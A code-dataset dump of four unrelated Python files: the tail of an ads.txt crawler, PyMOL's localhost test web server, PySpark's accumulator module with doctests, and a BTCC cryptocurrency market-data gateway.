db_domain.adstxt_present = False
session.add(db_domain)
session.commit()
return
# Else we've got a valid record from Fetch. Update the db_domain
# details we hold locally but don't commit until the end.
else:
db_domain.last_updated = fetchdata.scraped_at
db_domain.adstxt_present = True
session.add(db_domain)
# We want to look back and verify that all of these exist.
processed_records = []
for row in fetchdata.response:
# Transform the rows and add them to a list to validate against.
processed_row = transform.process_row(row)
# Check to see what the row is returning and process.
if isinstance(processed_row, transform.AdsRecord):
# Keep a list of records to compare back with.
processed_records.append(processed_row)
# Check for presence of record in existing Record table.
# If if does then skip to the next record.
try:
record_exists = session.query(
models.Record.supplier_domain,
models.Record.pub_id,
models.Record.supplier_relationship,
models.Record.cert_authority).filter_by(
domain=db_domain,
supplier_domain=processed_row.supplier_domain,
pub_id=processed_row.pub_id,
supplier_relationship=processed_row.supplier_relationship
).one_or_none()
# Something in the query was bad. Skip to the next record.
except SQLAlchemyError as excpt:
LOG.exception('Unprocessible row. %r is bad due to %r',
processed_row, excpt)
continue
if not record_exists:
db_record = models.Record(
domain_id=db_domain.id,
supplier_domain=processed_row.supplier_domain,
pub_id=processed_row.pub_id,
supplier_relationship=processed_row.supplier_relationship,
cert_authority=processed_row.cert_authority,
first_seen=fetchdata.scraped_at,
active=True)
LOG.debug('Adding new record to database, %r', db_record)
try:
session.add(db_record)
except DBAPIError:
LOG.error('Unable to insert... %r', db_record)
else:
LOG.debug('Record already exists in database, skipping.')
elif isinstance(processed_row, transform.AdsVariable):
# Check for presence of variable in Variable table.
# If it does then skip to next record.
variable_exists = session.query(
models.Variable).filter_by(
domain=db_domain,
key=processed_row.key).first()
if not variable_exists:
LOG.debug('New variable %r inserted for %r',
db_domain.name, processed_row.key)
db_variable = models.Variable(
domain_id=db_domain.id,
key=processed_row.key,
value=processed_row.value)
session.add(db_variable)
elif variable_exists.value != processed_row.value:
LOG.debug('Key %r for %r has been updated.',
variable_exists.key, db_domain.name)
variable_exists.value = processed_row.value
session.add(variable_exists)
else:
# Check is there and is up to date.
continue
# Else it's nil, skip to next record.
else:
continue
# Validate that evereything in the records table is also in our list
# of processed rows. Run through the record table then variables.
active_records = session.query(
models.Record.supplier_domain,
models.Record.pub_id,
models.Record.supplier_relationship,
models.Record.cert_authority).filter_by(
domain_id=db_domain.id, active=True).all()
# Find what's in active_records but is not in processed_records.
active_records_not_seen = set(active_records).difference(
set(processed_records))
# Set all of these records as inactive.
for record in active_records_not_seen:
LOG.debug('%r was found to be inactive.', record)
session.query(
models.Record).filter_by(
domain_id=db_domain.id,
supplier_domain=record.supplier_domain,
pub_id=record.pub_id,
supplier_relationship=record.supplier_relationship,
cert_authority=record.cert_authority).one().active = False
# Domain is completely processed at this point. Commit all records.
session.commit()
LOG.debug('Session commited and domain processed.')
def fetch_domains(self) -> List[str]:
if self.file:
return self._fetch_from_file(self.file_uri)
else:
return self._query_for_domains(self.es_index, self.es_query)
def _fetch_from_file(self, path) -> List[str]:
with open(path, 'r') as f:
domain_file = f.read()
domains = []
for row in domain_file.split('\n'):
if row:
domains.append(row)
return domains
def _query_for_domains(self, index, body) -> List[str]:
query = json.loads(body)
res = self.es.search(index=index, body=query)
# Return just the domains.
domains = [i['key'] for i
in res['aggregations']['top_domains']['buckets']]
LOG.debug('Fetched total %s domains from ES.', len(domains))
return domains
def _run_once(self) -> None:
"""Query for domains and insert into database.
Pipeline works as follows, we query for domains and check their
viability for searching. We setup a worker thread which processes
fetched results in the background, while in the foreground we generate
a list of futures which fetch using aiohttp/asyncio and are gathered.
These populate a background queue which processes all of these events
until the queue has had all items processed.
It would be best if we used async callbacks or similar that then
updated the database once a fetch was done, this however requires
a working asyncio/mysql/sqlalchemy wrapper. Until that exists or we
can spend the time working on one this pattern is the best we can do.
Args:
None
Returns:
None
ATTENTION: This requires databases and connections to be
bootstrapped. If you're manually running this please call
self._bootstrap_db as well.
"""
# Query for domains and filter to see if theyt're checkable.
domains = [x for x in self.fetch_domains()
if self._check_viability(x)]
def worker():
while True:
# Get a fetch event from the Queue and write to DB.
fetch_event = fetch_queue.get(block=True)
# Check to see if the sentinel value has been pushed in.
if fetch_event is None:
# Let's break out of this loop and exit the function.
break
# Catch the top level exception and continue onto the next
# record.
try:
self.process_domain(fetch_event)
except Exception as e:
LOG.exception(e)
pass
# Ack that event as being done.
fetch_queue.task_done()
# Log this event as being processed.
LOG.debug('Task done %r', fetch_event)
# Setup a Queue and worker for processing fetch events.fetch
fetch_queue = queue.Queue() # type: queue.Queue
thread = threading.Thread(target=worker)
thread.start()
# Most of what we're doing here is waiting on network IO of some kind.
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def fetcher(domain):
try:
fetch_event = await fetch.fetch(domain, self.crawler_id)
# Just crush exceptions here
except Exception:
pass
else:
fetch_queue.put(fetch_event)
# Setup a list of function calls.
fetches = [fetcher(x) for x in domains]
# This could potentially grow to be very large.
loop.run_until_complete(asyncio.gather(*fetches))
# Close the loop once we're done.
loop.close()
# Block until all tasks are done.
fetch_queue.join()
# Add our sentinel value so the worker quits it's loop.
fetch_queue.put(None)
# Close thread now we're done writing to the database.
thread.join()
def run(self) -> None:
LOG.info('Starting adstxt crawler...')
self._bootstrap_db()
LOG.info('Databases bootstrapped...')
while True:
LOG.info('Searching for domains to crawl...')
self._run_once()
LOG.info('Done processing current available domains.')
# There's no sleeping as this process takes ages.
# Just loop round and update anything that's required.
|
justhttpd.py
|
# Copyright (C) Schrodinger, LLC.
# All Rights Reserved
#
# For more information, see LICENSE in PyMOL's home directory.
#
# justhttpd.py
#
# vanilla web server designed for testing multi-origin applications
# by serving up content on 127.0.0.1:xxxx instead of localhost:yyyy
import BaseHTTPServer, cgi, urlparse, socket
import types, os, sys, traceback, threading
class _HTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.process_request()
def do_POST(self):
self.process_request()
def process_request(self):
"""
parse any URL or FORM arguments and process the request
"""
# verify that the request is coming from localhost
try:
host, port = self.client_address
if host != '127.0.0.1':
self.send_error(403,
"Only localhost requests are allowed (not: %s)"
% host)
else:
self.callback = None
self.parse_args()
self.send_doc()
except socket.error:
pass
def parse_args(self):
if (self.command == "POST"):
self.fs = cgi.FieldStorage(fp=self.rfile, headers=self.headers,
environ = {'REQUEST_METHOD':'POST'},
keep_blank_values = 1)
self.urlpath = self.path
elif (self.command == "GET"):
scheme,netloc,path,params,qs,fragment = urlparse.urlparse(self.path)
self.fs = cgi.FieldStorage(environ = {'REQUEST_METHOD':'GET',
'QUERY_STRING':qs},
keep_blank_values = 1)
self.urlpath = path
else:
self.fs = None
def send_doc(self):
"""
send a document (file) in the current directory or any sub-directory
"""
path_list = self.path.split('/')[1:]
if '..' in path_list: # prevent access to parent directories
self.send_error(404,"Illegal path.")
self.wfile.write(": %s" % self.path)
elif self.server.root == None:
self.send_error(404,"No content root specified.")
else:
try:
full_path = os.path.join(*[self.server.root] +
list(path_list))
print full_path
if os.path.isdir(full_path):
full_path = full_path + "/index.html"
fp = open(full_path,"rb")
self.send_ok(self.guess_mime(full_path))
self.wfile.write(fp.read())
fp.close()
except:
self.send_error(404,"Unable to locate document.")
self.wfile.write(": %s" % self.path)
self.wfile.write(str(sys.exc_info())) # exc_info() is thread safe
# self.wfile.write(sys.exc_value) # exc_value is not thread safe
def guess_mime(self,path):
"""
guess the mime type based on the file extension
"""
if path.endswith('.html'):
return 'text/html'
elif path.endswith('.js'):
return 'application/x-javascript'
elif path.endswith('.jpg'):
return 'image/jpeg'
elif path.endswith('.png'):
return 'image/png'
elif path.endswith('.gif'):
return 'image/gif'
elif path.endswith('.sdf'):
return 'chemical/x-mdl-sdfile'
elif path.endswith('.mol'):
return 'chemical/x-mdl-molfile'
elif path.endswith('.pwg'):
return 'application/x-pymol'
else:
return 'text/plain'
def send_error(self,errcode,errmsg):
try:
self.send_response(errcode)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write("HTTPd-Error: "+errmsg+"\n")
except:
# right now we're swallowing any/all exceptions
# (e.g. Broken Pipe)
pass
def send_ok(self, mime='text/html'):
self.send_response(200)
self.send_header('Content-type', mime)
self.send_header('Pragma','no-cache')
self.send_header('Cache-Control','no-cache, must-revalidate')
self.send_header('Expires','Sat, 10 Jan 2008 01:00:00 GMT')
self.end_headers()
def echo_args(self):
"""
for debugging requests
"""
self.wfile.write("%s\n" % self.command)
if (self.fs):
for k in self.fs.keys():
self.wfile.write("%s = " % k)
# key can have multiple values, as with checkboxes,
# but also arbitrarily
if (isinstance(self.fs[k], types.ListType)):
self.wfile.write("%s\n" % self.fs.getlist(k))
else:
# key can be uploaded file
if (self.fs[k].filename):
self.wfile.write("%s\n" % self.fs[k].filename)
fp = self.fs[k].file
#self.wfile.write("FILE %s" % cgi.escape(repr(fp)))
#self.wfile.write("%s\n" % fp.name)
# fails for StringIO instances
self.wfile.write("%s\n" % repr(fp))
# two ways to get file contents
#file_contents = self.fs.getvalue(k)
#file_contents = fp.read()
#self.wfile.write("%s" % file_contents)
else:
#plain-old key/value
self.wfile.write("%s\n" % self.fs.getvalue(k))
else:
self.wfile.write("No args\n")
class PlainHttpd:
def __init__(self, port=0, root=None):
self.port = int(port)
self.stop_event = threading.Event()
self.stop_event.set()
self.root = root
self.server = BaseHTTPServer.HTTPServer(('', self.port),
_HTTPRequestHandler)
if self.port == 0:
self.port = self.server.socket.getsockname()[1]
self.server.root = self.root
def _server_thread(self):
while not self.stop_event.isSet():
self.server.handle_request()
def start(self): # spawn thread
print " HTTPd: serving requests on http://127.0.0.1:%d" % self.port
t = threading.Thread(target=self._server_thread)
t.setDaemon(1)
self.stop_event.clear()
t.start()
def stop(self):
if not self.stop_event.isSet():
self.stop_event.set()
try: # create a request in order to release the handler
import urllib
urllib.urlopen("http://localhost:%d" % self.port)
except:
pass
self.server.socket.close()
def main():
import os
# initialize the server, with current local working directory as root
server = PlainHttpd(0, ".")
# get a dynamically assigned port number
port = server.port
# start handling requests
server.start()
# now launch a browser pointing at our server
import webbrowser
webbrowser.open("http://127.0.0.1:%d"%port)
if __name__ in [ '__main__', 'pymol' ]:
# intended to be launched with normal Python or
# pymol -qc justhttpd.py
main()
import time
while 1:
time.sleep(1)
|
accumulators.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> a = sc.accumulator(1)
>>> a.value
1
>>> a.value = 2
>>> a.value
2
>>> a += 5
>>> a.value
7
>>> sc.accumulator(1.0).value
1.0
>>> sc.accumulator(1j).value
1j
>>> rdd = sc.parallelize([1,2,3])
>>> def f(x):
... global a
... a += x
>>> rdd.foreach(f)
>>> a.value
13
>>> b = sc.accumulator(0)
>>> def g(x):
... b.add(x)
>>> rdd.foreach(g)
>>> b.value
6
>>> from pyspark.accumulators import AccumulatorParam
>>> class VectorAccumulatorParam(AccumulatorParam):
... def zero(self, value):
... return [0.0] * len(value)
... def addInPlace(self, val1, val2):
... for i in range(len(val1)):
... val1[i] += val2[i]
... return val1
>>> va = sc.accumulator([1.0, 2.0, 3.0], VectorAccumulatorParam())
>>> va.value
[1.0, 2.0, 3.0]
>>> def g(x):
... global va
... va += [x] * 3
>>> rdd.foreach(g)
>>> va.value
[7.0, 8.0, 9.0]
>>> rdd.map(lambda x: a.value).collect() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> def h(x):
... global a
... a.value = 7
>>> rdd.foreach(h) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> sc.accumulator([1.0, 2.0, 3.0]) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
TypeError:...
"""
import sys
import select
import struct
if sys.version < '3':
import SocketServer
else:
import socketserver as SocketServer
import threading
from pyspark.serializers import read_int, PickleSerializer
__all__ = ['Accumulator', 'AccumulatorParam']
pickleSer = PickleSerializer()
# Holds accumulators registered on the current machine, keyed by ID. This is then used to send
# the local accumulator updates back to the driver program at the end of a task.
_accumulatorRegistry = {}
def _deserialize_accumulator(aid, zero_value, accum_param):
from pyspark.accumulators import _accumulatorRegistry
# If this certain accumulator was deserialized, don't overwrite it.
if aid in _accumulatorRegistry:
return _accumulatorRegistry[aid]
else:
accum = Accumulator(aid, zero_value, accum_param)
accum._deserialized = True
_accumulatorRegistry[aid] = accum
return accum
class Accumulator(object):
"""
A shared variable that can be accumulated, i.e., has a commutative and associative "add"
operation. Worker tasks on a Spark cluster can add values to an Accumulator with the `+=`
operator, but only the driver program is allowed to access its value, using `value`.
Updates from the workers get propagated automatically to the driver program.
While :class:`SparkContext` supports accumulators for primitive data types like :class:`int` and
:class:`float`, users can also define accumulators for custom types by providing a custom
:class:`AccumulatorParam` object. Refer to the doctest of this module for an example.
"""
def __init__(self, aid, value, accum_param):
"""Create a new Accumulator with a given initial value and AccumulatorParam object"""
from pyspark.accumulators import _accumulatorRegistry
self.aid = aid
self.accum_param = accum_param
self._value = value
self._deserialized = False
_accumulatorRegistry[aid] = self
def __reduce__(self):
"""Custom serialization; saves the zero value from our AccumulatorParam"""
param = self.accum_param
return (_deserialize_accumulator, (self.aid, param.zero(self._value), param))
@property
def value(self):
"""Get the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
return self._value
@value.setter
def value(self, value):
"""Sets the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
self._value = value
def add(self, term):
"""Adds a term to this accumulator's value"""
self._value = self.accum_param.addInPlace(self._value, term)
def __iadd__(self, term):
"""The += operator; adds a term to this accumulator's value"""
self.add(term)
return self
def __str__(self):
return str(self._value)
def __repr__(self):
return "Accumulator<id=%i, value=%s>" % (self.aid, self._value)
class AccumulatorParam(object):
"""
Helper object that defines how to accumulate values of a given type.
"""
def zero(self, value):
"""
Provide a "zero value" for the type, compatible in dimensions with the
provided `value` (e.g., a zero vector)
"""
raise NotImplementedError
def addInPlace(self, value1, value2):
"""
Add two values of the accumulator's data type, returning a new value;
for efficiency, can also update `value1` in place and return it.
"""
raise NotImplementedError
class AddingAccumulatorParam(AccumulatorParam):
"""
An AccumulatorParam that uses the + operators to add values. Designed for simple types
such as integers, floats, and lists. Requires the zero value for the underlying type
as a parameter.
"""
def __init__(self, zero_value):
self.zero_value = zero_value
def zero(self, value):
return self.zero_value
def addInPlace(self, value1, value2):
value1 += value2
return value1
# Singleton accumulator params for some standard types
INT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0)
FLOAT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0)
COMPLEX_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0j)
class _UpdateRequestHandler(SocketServer.StreamRequestHandler):
"""
This handler will keep polling updates from the same socket until the
server is shutdown.
"""
def handle(self):
from pyspark.accumulators import _accumulatorRegistry
auth_token = self.server.auth_token
def poll(func):
while not self.server.server_shutdown:
# Poll every 1 second for new data -- don't block in case of shutdown.
r, _, _ = select.select([self.rfile], [], [], 1)
if self.rfile in r:
if func():
break
def accum_updates():
num_updates = read_int(self.rfile)
for _ in range(num_updates):
(aid, update) = pickleSer._read_with_length(self.rfile)
_accumulatorRegistry[aid] += update
# Write a byte in acknowledgement
self.wfile.write(struct.pack("!b", 1))
return False
def authenticate_and_accum_updates():
received_token = self.rfile.read(len(auth_token))
if isinstance(received_token, bytes):
received_token = received_token.decode("utf-8")
if (received_token == auth_token):
accum_updates()
# we've authenticated, we can break out of the first loop now
return True
else:
raise Exception(
"The value of the provided token to the AccumulatorServer is not correct.")
# first we keep polling till we've received the authentication token
poll(authenticate_and_accum_updates)
# now we've authenticated, don't need to check for the token anymore
poll(accum_updates)
class AccumulatorServer(SocketServer.TCPServer):
def __init__(self, server_address, RequestHandlerClass, auth_token):
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass)
self.auth_token = auth_token
"""
A simple TCP server that intercepts shutdown() in order to interrupt
our continuous polling on the handler.
"""
server_shutdown = False
def shutdown(self):
self.server_shutdown = True
SocketServer.TCPServer.shutdown(self)
self.server_close()
def _start_update_server(auth_token):
"""Start a TCP server to receive accumulator updates in a daemon thread, and returns it"""
server = AccumulatorServer(("localhost", 0), _UpdateRequestHandler, auth_token)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
if __name__ == "__main__":
import doctest
(failure_count, test_count) = doctest.testmod()
if failure_count:
sys.exit(-1)
|
btcc.py
|
from restful_api_socket import RESTfulApiSocket
from exchanges.gateway import ExchangeGateway
from market_data import L2Depth, Trade
from util import Logger
from instrument import Instrument
from clients.sql_template import SqlClientTemplate
import time
import threading
from functools import partial
from datetime import datetime
class ExchGwBtccRestfulApi(RESTfulApiSocket):
"""
Exchange gateway BTCC RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_order_book_timestamp_field_name(cls):
return ''
@classmethod
def get_trades_timestamp_field_name(cls):
return ''
@classmethod
def get_bids_field_name(cls):
return ''
@classmethod
def get_asks_field_name(cls):
return ''
@classmethod
def get_trade_side_field_name(cls):
return ''
@classmethod
def get_trade_id_field_name(cls):
return ''
@classmethod
def get_trade_price_field_name(cls):
return ''
@classmethod
def get_trade_volume_field_name(cls):
return ''
@classmethod
def get_order_book_link(cls, instmt):
return ""
@classmethod
def get_trades_link(cls, instmt, trade_id=''):
return ""
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
keys = list(raw.keys())
if cls.get_order_book_timestamp_field_name() in keys and \
cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# Date time
date_time = float(raw[cls.get_order_book_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
l2_depth.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[0], reverse=True)
for i in range(0, min(5, len(bids))):
l2_depth.bids[i].price = float(bids[i][0]) if not isinstance(bids[i][0], float) else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if not isinstance(bids[i][1], float) else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[0])
for i in range(0, min(5, len(asks))):
l2_depth.asks[i].price = float(asks[i][0]) if not isinstance(asks[i][0], float) else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if not isinstance(asks[i][1], float) else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trades_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if len(res) > 0:
for t in res:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwBtcc(ExchangeGateway):
"""
Exchange gateway BTCC
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwBtccRestfulApi(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'BTCC'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t1.start()
t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t2.start()
return [t1, t2]
class ExchGwBtccSpotRestfulApi(ExchGwBtccRestfulApi):
"""
Exchange gateway Spot Instrument RESTful API
"""
def __init__(self):
ExchGwBtccRestfulApi.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_order_book_timestamp_field_name(cls):
return 'date'
@classmethod
def get_trades_timestamp_field_name(cls):
return 'date'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'type'
@classmethod
def get_trade_id_field_name(cls):
return 'tid'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://data.btcchina.com/data/orderbook?limit=5&market=%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if int(instmt.get_exch_trade_id()) > 0:
return "https://data.btcchina.com/data/historydata?market=%s&since=%s" % \
(instmt.get_instmt_code(), instmt.get_exch_trade_id())
else:
return "https://data.btcchina.com/data/historydata?limit=100&market=%s" % \
(instmt.get_instmt_code())
class ExchGwBtccFutureRestfulApi(ExchGwBtccRestfulApi):
"""
Exchange gateway Spot Instrument RESTful API
"""
def __init__(self):
ExchGwBtccRestfulApi.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1000
@classmethod
def get_order_book_timestamp_field_name(cls):
return 'date'
@classmethod
def get_trades_timestamp_field_name(cls):
return 'Timestamp'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'Side'
@classmethod
def get_trade_id_field_name(cls):
return 'Id'
@classmethod
def get_trade_price_field_name(cls):
return 'Price'
@classmethod
def get_trade_volume_field_name(cls):
return 'Quantity'
@classmethod
def get_order_book_link(cls, instmt):
return "https://pro-data.btcc.com/data/pro/orderbook?limit=5&symbol=%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if int(instmt.get_exch_trade_id()) > 0:
return "https://pro-data.btcc.com/data/pro/historydata?symbol=%s&since=%s" % \
(instmt.get_instmt_code(), instmt.get_exch_trade_id())
else:
return "https://pro-data.btcc.com/data/pro/historydata?limit=100&symbol=%s" % \
(instmt.get_instmt_code())
class ExchGwBtccSpot(ExchGwBtcc):
"""
Exchange gateway BTCC-Spot
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwBtccSpotRestfulApi(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'BTCC_Spot'
class ExchGwBtccFuture(ExchGwBtcc):
"""
Exchange gateway BTCC-Future
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwBtccFutureRestfulApi(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'BTCC_Future'
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'BTCC_Spot'
instmt_name = 'BTCCNY'
instmt_code = 'btccny'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwBtccSpot([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_order_book_table_name(exch.get_order_book_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
instmt.set_trades_table_name(exch.get_trades_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
instmt.set_recovered(False)
exch.get_order_book_worker(instmt)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.